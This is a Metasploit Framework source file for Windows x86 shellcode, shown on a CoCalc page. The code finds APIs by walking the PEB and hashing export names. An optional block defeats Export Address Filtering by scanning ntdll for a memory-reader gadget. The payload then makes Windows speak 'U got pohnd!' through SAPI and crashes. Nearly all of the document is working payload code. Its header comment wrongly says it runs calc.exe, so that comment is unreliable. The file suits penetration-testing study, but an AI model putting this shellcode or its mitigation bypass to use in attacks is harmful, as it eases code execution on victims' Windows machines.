CoCalc -- w32-speaking-shellcode.asm

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/shellcode/windows/speech/w32-speaking-shellcode.asm
Views: ¹¹⁷⁸⁴
1
; Copyright (c) 2009-2010, Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
2
; Project homepage: http://code.google.com/p/w32-dl-loadlib-shellcode/
3
; All rights reserved. See COPYRIGHT.txt for details.
4
BITS 32
5
; Windows x86 null-free shellcode that executes calc.exe.
6
; Works in any application for Windows 5.0-7.0 all service packs.
7
; (See http://skypher.com/wiki/index.php/Hacking/Shellcode).
8
; This version uses 16-bit hashes.
9

10
%include 'w32-speaking-shellcode-hash-list.asm'
11

12
%define B2W(b1,b2)                      (((b2) << 8) + (b1))
13
%define W2DW(w1,w2)                     (((w2) << 16) + (w1))
14
%define B2DW(b1,b2,b3,b4)               (((b4) << 24) + ((b3) << 16) + ((b2) << 8) + (b1))
15

16
%ifdef STACK_ALIGN
17
    AND     SP, 0xFFFC
18
%endif
19
find_hash: ; Find ntdll's InInitOrder list of modules:
20
    XOR     ESI, ESI                    ; ESI = 0
21
    MOV     ESI, [FS:ESI + 0x30]        ; ESI = &(PEB) ([FS:0x30])
22
    MOV     ESI, [ESI + 0x0C]           ; ESI = PEB->Ldr
23
    MOV     ESI, [ESI + 0x1C]           ; ESI = PEB->Ldr.InInitOrder (first module)
24

25
%ifdef DEFEAT_EAF
26
  ; The first loaded module is ntdll on x86 systems and ntdll32 on x64 systems. Both modules have this code:
27
  ; ntdll32!RtlGetCurrentPeb (<no parameter info>)
28
  ;     64a118000000    mov     eax,dword ptr fs:[00000018h]
29
  ;     8b4030          mov     eax,dword ptr [eax+30h]
30
  ;     c3              ret
31
      MOV     EDX, [ESI + 0x08]           ; EDX = InInitOrder[X].base_address == module
32
      MOVZX   EBP, WORD [EDX + 0x3C]      ; EBX = module->pe_header_offset
33
      ADD     EDX, [EDX + EBP + 0x2C]     ; EDX = module + module.pe_header->code_offset == module code
34
      MOV     DH, 0xF                     ; The EAF breakpoints are in tables that are at the start of ntdll,
35
                                          ; so we can avoid them easily...
36
  scan_for_memory_reader:
37
      INC     EDX
38
      CMP     DWORD [EDX], 0xC330408B     ; EDX => MOV EAX, [EAX+30], RET ?
39
      JNE     scan_for_memory_reader
40
      PUSH    EDX                         ; Stack = &(defeat eaf)
41
%endif
42
    PUSH    ESI                         ; Stack = InInitOrder[0], [&(defeat eaf)]
43
    MOV     SI, hash_kernel32_LoadLibraryA
44

45
next_module: ; Get the baseaddress of the current module and find the next module:
46
    POP     EDI                         ; EDI = InInitOrder[X] | Stack = [&(defeat eaf), ] "ole32\0\0\0"
47
    MOV     EBP, [EDI + 0x08]           ; EBP = InInitOrder[X].base_address
48
    PUSH    DWORD [EDI]                 ; Stack = InInitOrder[X].flink == InInitOrder[X+1], [&(defeat eaf), ] "ole32\0\0\0"
49
get_proc_address_loop: ; Find the PE header and export and names tables of the module:
50
    MOV     EBX, [EBP + 0x3C]           ; EBX = &(PE header)
51
    MOV     EBX, [EBP + EBX + 0x78]     ; EBX = offset(export table)
52
    ADD     EBX, EBP                    ; EBX = &(export table)
53
    MOV     ECX, [EBX + 0x18]           ; ECX = number of name pointers
54
    JCXZ    next_module                 ; No name pointers? Next module.
55
next_function_loop: ; Get the next function name for hashing:
56
    MOV     EDI, [EBX + 0x20]           ; EDI = offset(names table)
57
    ADD     EDI, EBP                    ; EDI = &(names table)
58
    MOV     EDI, [EDI + ECX * 4 - 4]    ; EDI = offset(function name)
59
    ADD     EDI, EBP                    ; EDI = &(function name)
60
    XOR     EAX, EAX                    ; EAX = 0
61
    CDQ                                 ; EDX = 0
62
hash_loop: ; Hash the function name and compare with requested hash
63
    XOR     DL, [EDI]
64
    ROR     DX, BYTE hash_ror_value
65
    SCASB
66
    JNE     hash_loop
67
    DEC     ECX
68
    CMP     DX, SI                      ; Is this the hash we're looking for?
69
    JE      found_function              ;
70
    JCXZ    next_module                 ; Not the right hash and no functions left in module? Next module
71
    JMP     next_function_loop          ; Not the right hash and functions left in module? Next function
72
found_function:
73
    ; Found the right hash: get the address of the function:
74
    MOV     ESI, [EBX + 0x24]           ; ESI = offset ordinals table
75
    ADD     ESI, EBP                    ; ESI = &oridinals table
76
    MOVZX   ESI, WORD [ESI + 2 * ECX]   ; ESI = ordinal number of function
77
%ifdef DEFEAT_EAF
78
    LEA     EAX, [EBX + 0x1C - 0x30]    ; EAX = &offset address table - MEMORY_READER_OFFSET
79
    CALL    [ESP + 4]                   ; call defeat eaf: EAX = [EAX + 0x30] == [&offset address table] == offset address table
80
%else
81
    MOV     EAX, [EBX + 0x1C]           ; EDI = offset address table
82
%endif
83
    ADD     EAX, EBP                    ; EAX = &address table
84
    MOV     EDI, [EAX + 4 * ESI]        ; EDI = offset function
85
    ADD     EDI, EBP                    ; EDI = &(function)
86
    XOR     ESI, ESI                    ; ESI = 0
87
    CMP     DX, hash_ole32_CoInitialize ;
88
    JE      ole32_CoInitialize          ;
89
    CMP     DX, hash_ole32_CoCreateInstance
90
    JE      ole32_CoCreateInstance      ;
91
kernel32_LoadLibrary:
92
    PUSH    BYTE '2'                    ; Stack = "2\0\0\0", InInitOrder[X] [, &(defeat eaf)]
93
    PUSH    B2DW('o', 'l', 'e', '3')    ; Stack = "ole32\0\0\0", InInitOrder[X] [, &(defeat eaf)]
94
    PUSH    ESP                         ; Stack = &("ole32"), "ole32\0\0\0", InInitOrder[X] [, &(defeat eaf)]
95
    CALL    EDI                         ; LoadLibraryA(&("ole32")) | Stack = "ole32\0\0\0", InInitOrder[X] [, &(defeat eaf)]
96
    XCHG    EAX, EBP                    ; EBP = &(ole32.dll)
97
%ifdef DEFEAT_EAF
98
    POP     EAX                         ; Stack = "2\0\0\0", InInitOrder[X], &(defeat eaf)]
99
    POP     EAX                         ; Stack = InInitOrder[X], &(defeat eaf)
100
%endif
101
    MOV     SI, hash_ole32_CoInitialize ;
102
    JMP     get_proc_address_loop
103

104
ole32_CoInitialize:
105
    PUSH    ESI                         ; Stack = 0, InInitOrder[X] [, &(defeat eaf)]
106
    CALL    EDI                         ; CoInitialize(NULL), Stack = InInitOrder[X] [, &(defeat eaf)]
107
    MOV     SI, hash_ole32_CoCreateInstance ;
108
    JMP     get_proc_address_loop
109
    
110
ole32_CoCreateInstance:
111
    PUSH    0xd422046e
112
    PUSH    0x99efeca1
113
    PUSH    0x499272b9
114
    PUSH    0x6c44df74                  ; Stack = IID_ISpVoice, ....
115
    MOV     EAX, ESP                    ; EAX = &(IID_ISpVoice)
116
    PUSH    0x9673794f
117
    PUSH    0xc001e39e
118
    DEC     DWORD [ESP+2]
119
    PUSH    0x11d23391
120
    PUSH    0x96749377                  ; Stack = CLSID_SpVoice, IID_ISpVoice, ....
121
    MOV     EBX, ESP                    ; EBX = &(CLSID_SpVoice), ...
122
    PUSH    ESI                         ; Stack = voice, CLSID_SpVoice, IID_ISpVoice, ....
123
    PUSH    ESP                         ; Stack = &(voice), voice, CLSID_SpVoice, IID_ISpVoice, ....
124
    PUSH    EAX                         ; Stack = &(IID_ISpVoice), &(voice), voice, CLSID_SpVoice, IID_ISpVoice, ....
125
    PUSH    BYTE 0x17                   ; Stack = CLSCTX_ALL, &(IID_ISpVoice), &(voice), voice, ....
126
    PUSH    ESI                         ; Stack = NULL, CLSCTX_ALL, &(IID_ISpVoice), &(voice), voice, ....
127
    PUSH    EBX                         ; Stack = &(CLSID_SpVoice), NULL, CLSCTX_ALL, &(IID_ISpVoice), &(voice), voice, ....
128
    CALL    EDI                         ; CoCreateInstance(&(CLSID_SpVoice), NULL, CLSCTX_ALL, &(IID_ISpVoice), &voice) | Stack = voice, ...
129
    POP     EBX                         ; EBX = voice | Stack = ...
130
    PUSH    B2DW('o', 'g', ' ', 'U')    ; Stack = "og U", ...
131
    PUSH    B2DW('o', 'p', ' ', 't')    ; Stack = "op tog U", ...
132
    PUSH    B2DW('!', 'd', 'n', 'h')    ; Stack = "!dnhop tog U", ...
133
    XCHG    EAX, ESI                    ; EAX = 0
134
    MOV     ESI, ESP                    ; ESI = &("!dnhop tog U")
135
    PUSH    EAX                         ; Stack = 0, "!dnhop tog U", ...
136
unicode_loop:
137
    LODSB                               ; read: "!dnhop tog U"
138
    PUSH    AX                          ; write: Stack = u"U got pohnd!", 0, "!dnhop tog U", ...
139
    CMP     AL, 'U'                     ; EAX == 0? (WCHAR == '\0'?)
140
    JNE     unicode_loop
141
    MOV     ECX, ESP                    ; ECX = &(u"U got pohnd!\0")
142
    XOR     EAX, EAX                    ; EAX = 0
143
    PUSH    EAX                         ; Stack = 0, ...
144
    PUSH    EAX                         ; Stack = 0, 0, ...
145
    PUSH    ECX                         ; Stack = &(u"U got pohnd!\0"), 0, 0, ...
146
    PUSH    EBX                         ; Stack = voice, &(u"U got pohnd!\0"), 0, 0, ...
147
    MOV     EDX, [EBX]                  ; EDX = voice->vftable
148
    MOV     ECX, [EDX+0x50]             ; ECX = voice->vftable->Speak
149
    CALL    ECX                         ; SpVoice::Speak(voice, &(u"U got pohnd!\0"), 0, 0) | Stack = ...
150
    INT3                                ; Crash
151

152
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
